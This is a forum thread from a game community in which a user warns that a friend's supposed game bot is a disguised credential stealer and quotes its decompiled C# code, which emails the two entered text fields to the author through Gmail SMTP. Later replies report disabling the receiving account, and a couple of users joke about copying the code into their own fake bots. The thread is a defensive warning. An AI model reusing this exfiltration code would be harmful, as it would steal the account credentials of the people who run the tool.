Official Everybody Edits Forums

Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?

You are not logged in.

#1 Before February 2015

jemhun
Guest

WARNING: Panasonic's hacking bot.

Panasonic just sent me a disguised dig bot.
Good thing I looked at the code first before I even try to open the program.

Here's what I found

MailMessage mailMessage = new MailMessage(); 			try 			{ 				mailMessage.From = new MailAddress("[snip:email]"); 				mailMessage.To.Add("<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="285c4d5c5a415b4a495c5c444d101810684f45494144064b4745">[email  protected]</a><script cf-hash='f9e31' type="text/javascript"> /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>"); 				mailMessage.Subject = "Account"; 				mailMessage.Body = string.Concat(this.TextBox1.Text, this.TextBox2.Text); 				SmtpClient smtpClient = new SmtpClient("smtp.gmail.com"); 				smtpClient.Port = 0x24b; 				smtpClient.EnableSsl = true; 				smtpClient.Credentials = new NetworkCredential("[snip:email]", "[snip:password]"); 				smtpClient.Send(mailMessage); 				this.TextBox2.Text = "";

Panasonic was my friend and I also helped him with his other bots and I usually test it.
But this one is different.

#2 Before February 2015

Nou
Member
Joined: 2015-02-24
Posts: 2,762

Re: WARNING: Panasonic's hacking bot.

This isn't the first time he's been caught.

http://eeforumify.com/viewtopic.php?id=23593


No u.

Offline

#3 Before February 2015

Zakleo
Guest

Re: WARNING: Panasonic's hacking bot.

Oh god. Why do people do this?

#4 Before February 2015

jemhun
Guest

Re: WARNING: Panasonic's hacking bot.

I can't log in "tetrisbattle's" account.
So I can't see who has been hacked :/

#5 Before February 2015

Nou
Member
Joined: 2015-02-24
Posts: 2,762

Re: WARNING: Panasonic's hacking bot.

Managed to get into the account, I've disabled the email address by changing the password and recovery email.

There appear to have been no victims, partially due to panasonic being a nub and failing some email forwarding. I think it's time for a ban.


No u.

Offline

#6 Before February 2015

jemhun
Guest

Re: WARNING: Panasonic's hacking bot.

That's weird I have entered my fake account a few times.
But good that nobody got hacked //forums.everybodyedits.com/img/smilies/big_smile

#7 Before February 2015

capasha
Member
Joined: 2015-02-21
Posts: 4,066

Re: WARNING: Panasonic's hacking bot.

Just another nub. Panasonic can't create bots so he steal accounts instead. Smart idea maybe.
People are too dumb anyway.

Offline

#8 Before February 2015

Garfield2436
Guest

Re: WARNING: Panasonic's hacking bot.

I haven't heard of this problem ever. What's going on with this?

#9 Before February 2015

capasha
Member
Joined: 2015-02-21
Posts: 4,066

Re: WARNING: Panasonic's hacking bot.

Awesome code. C&P on that one. Can be good to use in the future!

Offline

#10 Before February 2015

jemhun
Guest

Re: WARNING: Panasonic's hacking bot.

Usually panasonic makes some nubby code.
But this is different, It looks like somebody else coded it from him. (IDK)

#11 Before February 2015

ultrasuperdude
Guest

Re: WARNING: Panasonic's hacking bot.

Good thing you looked at it although it may have failed anyways good to know what his objective is.

#12 Before February 2015

STD
Formerly BenWanted
From: Binary by 0 and 1
Joined: 2015-08-19
Posts: 1,113

Re: WARNING: Panasonic's hacking bot.

Thanks for giving us the code to put this in our fake bots. XD Lol. Take it down.


random-pictures-316.jpg

Offline

jemhun 142391299448438

Board footer

Powered by FluxBB

[ Started around 1731789273.075 - Generated in 0.051 seconds, 14 queries executed - Memory usage: 1.41 MiB (Peak: 1.52 MiB) ]